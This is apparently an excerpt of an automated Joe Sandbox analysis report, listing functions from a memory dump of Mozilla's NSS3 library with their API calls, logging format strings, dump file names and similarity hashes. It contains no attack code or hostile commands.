Part of subcall function 6C760D30: calloc.MOZGLUE ref: 6C760D50
Part of subcall function 6C760D30: TlsGetValue.KERNEL32 ref: 6C760D6D

Part of subcall function 6C76C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C76DAE2,?), ref: 6C76C6C2

PORT_ArenaMark_Util.NSS3(?), ref: 6C76E972
PORT_ArenaMark_Util.NSS3(?), ref: 6C76E9C2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C76EA00
PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C76EA3F
SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C76EA5A
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C76EA81
SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6C76EA9E
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C76EACF
PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6C76EB56
PK11_FreeSymKey.NSS3(00000000), ref: 6C76EBC2
SECOID_FindOID_Util.NSS3(?), ref: 6C76EBEC
free.MOZGLUE(00000000), ref: 6C76EC58

Strings

Svl, xrefs: 6C76E9CA, 6C76EAAB

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
String ID: Svl
API String ID: 759478663-615140216
Opcode ID: 222e4417f7d781b39c01e2fa6328c076c9178316a668beb09ef749c60a371818
Instruction ID: 19d448496bd25cc1f5c5cef77184de5daa949ad2f393c95ccc6216d5890d1e1a
Opcode Fuzzy Hash: 222e4417f7d781b39c01e2fa6328c076c9178316a668beb09ef749c60a371818
Instruction Fuzzy Hash: BBC163B1E012099BEB00CF6ADE85BAA77B4AF05318F140479ED0A97F51E731E804CBE1

Function 6C7928C0 Relevance: 27.2, APIs: 18, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 6C795B40: PR_GetIdentitiesLayer.NSS3 ref: 6C795B56

TlsGetValue.KERNEL32 ref: 6C79290A
EnterCriticalSection.KERNEL32(00000001), ref: 6C79291E
TlsGetValue.KERNEL32 ref: 6C792937
EnterCriticalSection.KERNEL32(00000001), ref: 6C79294B
PR_EnterMonitor.NSS3(?), ref: 6C792966
PR_EnterMonitor.NSS3(?), ref: 6C7929AC
PR_ExitMonitor.NSS3(?), ref: 6C7929D1
PR_EnterMonitor.NSS3(?), ref: 6C7929F0
PR_EnterMonitor.NSS3(?), ref: 6C792A15
PR_EnterMonitor.NSS3(?), ref: 6C792A37
PR_ExitMonitor.NSS3(?), ref: 6C792A61
PR_ExitMonitor.NSS3(?), ref: 6C792A78
PR_ExitMonitor.NSS3(?), ref: 6C792A8F
PR_ExitMonitor.NSS3(?), ref: 6C792AA6

Part of subcall function 6C7C9440: TlsGetValue.KERNEL32 ref: 6C7C945B
Part of subcall function 6C7C9440: TlsGetValue.KERNEL32 ref: 6C7C9479
Part of subcall function 6C7C9440: EnterCriticalSection.KERNEL32 ref: 6C7C9495
Part of subcall function 6C7C9440: TlsGetValue.KERNEL32 ref: 6C7C94E4
Part of subcall function 6C7C9440: TlsGetValue.KERNEL32 ref: 6C7C9532
Part of subcall function 6C7C9440: LeaveCriticalSection.KERNEL32 ref: 6C7C955D

PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 6C792AF9
free.MOZGLUE(?), ref: 6C792B16
PR_Unlock.NSS3(?), ref: 6C792B6D
PR_Unlock.NSS3(?), ref: 6C792B80

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
String ID:
API String ID: 2841089016-0
Opcode ID: 9cd01f07ca7c0341d5fc05533387facb5d0e96390c18220da7615b6178f072a5
Instruction ID: 585e7ff36e04ffa4f33558cc009ad546adcd0d7c56dc38ab195fa669645ee309
Opcode Fuzzy Hash: 9cd01f07ca7c0341d5fc05533387facb5d0e96390c18220da7615b6178f072a5
Instruction Fuzzy Hash: BB81C4B5A007019BDB20AF35ED4D797B7E5AF15318F044938E85AC7B12EB36E518CB82

Function 6C819C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000080), ref: 6C819C70
PR_NewLock.NSS3 ref: 6C819C85

Part of subcall function 6C7C98D0: calloc.MOZGLUE(00000001,00000084,6C6F0936,00000001,?,6C6F102C), ref: 6C7C98E5

PR_NewCondVar.NSS3(00000000), ref: 6C819C96

Part of subcall function 6C6EBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C6F21BC), ref: 6C6EBB8C

PR_NewLock.NSS3 ref: 6C819CA9

Part of subcall function 6C7C98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C7C9946
Part of subcall function 6C7C98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6816B7,00000000), ref: 6C7C994E
Part of subcall function 6C7C98D0: free.MOZGLUE(00000000), ref: 6C7C995E

PR_NewLock.NSS3 ref: 6C819CB9
PR_NewLock.NSS3 ref: 6C819CC9
PR_NewCondVar.NSS3(00000000), ref: 6C819CDA

Part of subcall function 6C6EBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6EBBEB
Part of subcall function 6C6EBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C6EBBFB
Part of subcall function 6C6EBB80: GetLastError.KERNEL32 ref: 6C6EBC03
Part of subcall function 6C6EBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C6EBC19
Part of subcall function 6C6EBB80: free.MOZGLUE(00000000), ref: 6C6EBC22

PR_NewCondVar.NSS3(?), ref: 6C819CF0
PR_NewPollableEvent.NSS3 ref: 6C819D03

Part of subcall function 6C80F3B0: PR_CallOnce.NSS3(6C8614B0,6C80F510), ref: 6C80F3E6
Part of subcall function 6C80F3B0: PR_CreateIOLayerStub.NSS3(6C86006C), ref: 6C80F402
Part of subcall function 6C80F3B0: PR_Malloc.NSS3(00000004), ref: 6C80F416
Part of subcall function 6C80F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C80F42D
Part of subcall function 6C80F3B0: PR_SetSocketOption.NSS3(?), ref: 6C80F455
Part of subcall function 6C80F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C80F473

Part of subcall function 6C7C9890: TlsGetValue.KERNEL32(?,?,?,6C7C97EB), ref: 6C7C989E

EnterCriticalSection.KERNEL32(?), ref: 6C819D78
calloc.MOZGLUE(00000001,0000000C), ref: 6C819DAF
_PR_CreateThread.NSS3(00000000,6C819EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C819D9F

Part of subcall function 6C6EB3C0: TlsGetValue.KERNEL32 ref: 6C6EB403
Part of subcall function 6C6EB3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C6EB459

_PR_CreateThread.NSS3(00000000,6C81A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C819DE8
calloc.MOZGLUE(00000001,0000000C), ref: 6C819DFC
_PR_CreateThread.NSS3(00000000,6C81A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C819E29
calloc.MOZGLUE(00000001,0000000C), ref: 6C819E3D
_PR_MD_UNLOCK.NSS3(?), ref: 6C819E71
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C819E89

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
String ID:
API String ID: 4254102231-0
Opcode ID: 282b1e2fcf4c85fb385c5cad9dea92a41498f76471863691ae359d815860194e
Instruction ID: ba5b044850280a87e7dda3fa3a53f09646c648dc99f07f85fc15ae71081e18d9
Opcode Fuzzy Hash: 282b1e2fcf4c85fb385c5cad9dea92a41498f76471863691ae359d815860194e
Instruction Fuzzy Hash: 92613DB1A00706AFD725DF75D944AA7BBE8FF49208B04493AE819C7B11EB70E414CBE5

Function 6C758E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C758E01,00000000,6C759060,6C860B64), ref: 6C758E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C758E01,00000000,6C759060,6C860B64), ref: 6C758E9E
PORT_ArenaAlloc_Util.NSS3(6C860B64,00000001,?,?,?,?,6C758E01,00000000,6C759060,6C860B64), ref: 6C758EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C758E01,00000000,6C759060,6C860B64), ref: 6C758EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C758E01,00000000,6C759060,6C860B64), ref: 6C758ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C758E01,00000000,6C759060,6C860B64), ref: 6C758EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C758E01), ref: 6C758EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C860B64,6C860B64), ref: 6C758F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C758F3F

Part of subcall function 6C75A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C75A421,00000000,00000000,6C759826), ref: 6C75A136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C75904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C758E76

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: 9b5ba1435fe9ae7e91b0bd9499dd81ac49aea32ea7c4b0e185c54fa07c6968fd
Instruction ID: e1d5254456f7f16cf5895706498c30e545d80b436dfe45e35d66cd15bc4f1a4c
Opcode Fuzzy Hash: 9b5ba1435fe9ae7e91b0bd9499dd81ac49aea32ea7c4b0e185c54fa07c6968fd
Instruction Fuzzy Hash: 1461A6B5D00106ABDB10CF55CE44AAFB7B5FF94358F544938DC18A7B40EB32A926CBA0

Function 6C708E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C708E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C708E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C708EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C8318D0,?), ref: 6C708F03
PR_CallOnce.NSS3(6C862AA4,6C7612D0), ref: 6C708F19
PL_FreeArenaPool.NSS3(?), ref: 6C708F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C708F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C708F65
PL_FinishArenaPool.NSS3(?), ref: 6C708FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C708FFE
PR_CallOnce.NSS3(6C862AA4,6C7612D0), ref: 6C709012
PL_FreeArenaPool.NSS3(?), ref: 6C709024
PL_FinishArenaPool.NSS3(?), ref: 6C70902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C70903E

Strings

security, xrefs: 6C708EE7

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: d02079d89e0f3fa413a002534eb55032f2470d6c7e3f9261d2cbd0ea5a4e1537
Instruction ID: 562ca26fb7c9e701977749544f1eb08b9e3a14d1a1435ab3b96460ec80cdf9d8
Opcode Fuzzy Hash: d02079d89e0f3fa413a002534eb55032f2470d6c7e3f9261d2cbd0ea5a4e1537
Instruction Fuzzy Hash: 615146F1708200ABD7109A699F49BAB77ECAB8575CF44093AF85497F80E771E908C793

Function 6C734E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C734E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C734EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C734EC7

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C734EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C734F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C734F1A
PR_LogPrint.NSS3(?,00000000), ref: 6C734F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C734F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C734F68

Strings

C_GetAttributeValue, xrefs: 6C734E7E
hSession = 0x%x, xrefs: 6C734EA2, 6C734EB2
(CK_INVALID_HANDLE), xrefs: 6C734EC0, 6C734F13
pTemplate = 0x%p, xrefs: 6C734F4A
hObject = 0x%x, xrefs: 6C734EF5, 6C734F05
ulCount = %d, xrefs: 6C734F63

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
API String ID: 1003633598-3530272145
Opcode ID: c4f70aaebb7dce8cefbb9cc4627ebaae56009f7a222efba603167ed621186522
Instruction ID: 8b7c2e48209d0c083958b9f24e6e5ee11d92b6ed1b85805346d2527d7845706b
Opcode Fuzzy Hash: c4f70aaebb7dce8cefbb9cc4627ebaae56009f7a222efba603167ed621186522
Instruction Fuzzy Hash: 5A410331606025AFDB218B14DF4CFAA3BB9AB4230DF086434F4095BB52C739A948DBD6

Function 6C734CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C734CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C734D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C734D37

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C734D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C734D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C734D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C734DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C734DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C734E20

Strings

hSession = 0x%x, xrefs: 6C734D12, 6C734D22
(CK_INVALID_HANDLE), xrefs: 6C734D30, 6C734D83
C_GetObjectSize, xrefs: 6C734CEE
pulSize = 0x%p, xrefs: 6C734DB7
hObject = 0x%x, xrefs: 6C734D65, 6C734D75
*pulSize = 0x%x, xrefs: 6C734E1B

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
API String ID: 1003633598-3553622718
Opcode ID: 9d879be05d3ef0bf3cb8d90ed35dcd35c686f52acc4f1493dc8451c4a78b2fd7
Instruction ID: 1b14b7ff3a4f52b0f8035fb2255722c78a017c5e0421b68d1587f5d9f63e999d
Opcode Fuzzy Hash: 9d879be05d3ef0bf3cb8d90ed35dcd35c686f52acc4f1493dc8451c4a78b2fd7
Instruction Fuzzy Hash: 8D412471605124AFD7218B14DF8DF7A3BB9AB4230DF046874E50D5BB12D739A848DBD2

Function 6C737C90 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Verify), ref: 6C737CB6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C737CE4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C737CF3

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C737D09
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C737D2A
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C737D45
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C737D5E
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C737D77

Strings

C_Verify, xrefs: 6C737CB1
hSession = 0x%x, xrefs: 6C737CCE, 6C737CDE
(CK_INVALID_HANDLE), xrefs: 6C737CEC
pData = 0x%p, xrefs: 6C737D25
ulDataLen = %d, xrefs: 6C737D40
ulSignatureLen = %d, xrefs: 6C737D72
pSignature = 0x%p, xrefs: 6C737D59

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
API String ID: 1003633598-3278097884
Opcode ID: f89657dcc61dd16acf59abde3e05d3cc04d198655904f43b027bd09d5d738821
Instruction ID: 2a376e4abddbf549571a27d1fe7f2f61e4194feec7547da5ed4ac5db6613d96a
Opcode Fuzzy Hash: f89657dcc61dd16acf59abde3e05d3cc04d198655904f43b027bd09d5d738821
Instruction Fuzzy Hash: E331DF31602155EBDB218F25DF4DE7A37F5AB4220CF086474E40D5BB12DB38A848CBE2

Function 6C732F00 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6C732F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C732F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C732F63

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C732F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C732F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C732FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C732FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C732FE7

Strings

hSession = 0x%x, xrefs: 6C732F3E, 6C732F4E
(CK_INVALID_HANDLE), xrefs: 6C732F5C
C_SetPIN, xrefs: 6C732F21
pOldPin = 0x%p, xrefs: 6C732F95
ulNewLen = %d, xrefs: 6C732FE2
pNewPin = 0x%p, xrefs: 6C732FC9
ulOldLen = %d, xrefs: 6C732FB0

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN
API String ID: 1003633598-3716813897
Opcode ID: 5c3fbdb233c94a5af064ca01f116b974a71e8fe9e4308542273215097e78d4ac
Instruction ID: 3d9fde8af60f6fef0027ea6b4a1b179a96ab9337a8fab14be9c2af41998cd2fd
Opcode Fuzzy Hash: 5c3fbdb233c94a5af064ca01f116b974a71e8fe9e4308542273215097e78d4ac
Instruction Fuzzy Hash: 3A31F431605165ABDB219B55CF4CE6A37B6AB4634DF046474F80CABB13DB38A848CBD1

Function 6C73A9A0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptMessageBegin), ref: 6C73A9C6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C73A9F4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C73AA03

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C73AA19
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C73AA3A
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C73AA55
PR_LogPrint.NSS3( pAssociatedData = 0x%p,?), ref: 6C73AA6E
PR_LogPrint.NSS3( ulAssociatedDataLen = 0x%p,?), ref: 6C73AA87

Strings

hSession = 0x%x, xrefs: 6C73A9DE, 6C73A9EE
(CK_INVALID_HANDLE), xrefs: 6C73A9FC
pParameter = 0x%p, xrefs: 6C73AA35
ulParameterLen = 0x%p, xrefs: 6C73AA50
C_DecryptMessageBegin, xrefs: 6C73A9C1
pAssociatedData = 0x%p, xrefs: 6C73AA69
ulAssociatedDataLen = 0x%p, xrefs: 6C73AA82

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pAssociatedData = 0x%p$ pParameter = 0x%p$ ulAssociatedDataLen = 0x%p$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptMessageBegin
API String ID: 1003633598-2188218412
Opcode ID: 177919e84f8b9383db64c01296e879bb34bdc85bd7d9706ede9d7766d6899772
